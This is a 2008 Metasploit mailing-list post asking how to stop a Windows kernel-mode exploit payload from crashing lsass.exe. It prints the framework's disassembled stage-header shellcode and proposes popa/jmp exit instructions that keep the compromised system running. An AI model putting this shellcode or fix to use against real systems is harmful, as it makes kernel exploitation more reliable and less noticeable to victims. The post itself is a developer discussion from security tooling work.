[framework] Mistake in kernel mode payloads

Giuseppe Gottardi overet at securitydate.it
Tue Feb 26 18:27:24 CST 2008 

Hi mans,
I have a little trouble with windows kernel mode exploitation.

When an user land payload is executed in the context of lsass.exe
process, it forces the process lsass.exe to exit and the system shut
down after 60 seconds due to lsass.exe system error.

I think that it occurs because the payload don't terminate with:

61                           popa
FF250803FE7F   jmp near [0x7ffe0308]

In fact, stage header code supplied by metasploit has this code:

; Preserve the calling environment
0000003F  60                pusha
00000040  6A30              push byte +0x30
00000042  58                pop eax
00000043  99                cdq
00000044  648B18            mov ebx,[fs:eax]
; Check if Peb->Ldr is NULL
00000047  39530C            cmp [ebx+0xc],edx
0000004A  7426              jz 0x72
; Extract Peb->ProcessParameters->ImagePathName.Buffer
0000004C  8B5B10            mov ebx,[ebx+0x10]
0000004F  8B5B3C            mov ebx,[ebx+0x3c]
; Add 0x28 to the image path name (skip past c:\windows\system32\)
00000052  83C328            add ebx,byte +0x28
; Compare the name of the executable with lass
00000055  8B0B              mov ecx,[ebx]
00000057  034B03            add ecx,[ebx+0x3]
0000005A  81F96C617373      cmp ecx,0x7373616c
; If it doesn't match, execute the original system call dispatcher
00000060  7510              jnz 0x72
00000062  648B18            mov ebx,[fs:eax]
00000065  43                inc ebx
00000066  43                inc ebx
00000067  43                inc ebx
; Check if Peb->SpareBool is 1, if it is, execute the original
; system call dispatcher
00000068  803B01            cmp byte [ebx],0x1
0000006B  7405              jz 0x72
; Set Peb->SpareBool to 1
0000006D  C60301            mov byte [ebx],0x1
; Jump into the continuation stage
00000070  EB07              jmp short 0x79
; Restore the calling environment and execute the original system call
; dispatcher that was preserved in 0x7ffe0308
00000072  61                popa
00000073  FF250803FE7F      jmp near [0x7ffe0308]

; continuation of the stage


When in the first execution of the stage header the flow is directed
to the stage (00000070) there's no way to restore the registers and
jump to 0x7ffe0308, so the lsass.exe die.

Doing some tests I put:

61                           popa
FF250803FE7F   jmp near [0x7ffe0308]

as "exit code" instructions, and the system could continue to live
without problems.


Do you have some suggestion to do this in metasploit?


Regards,
oveRet

More information about the Framework mailing list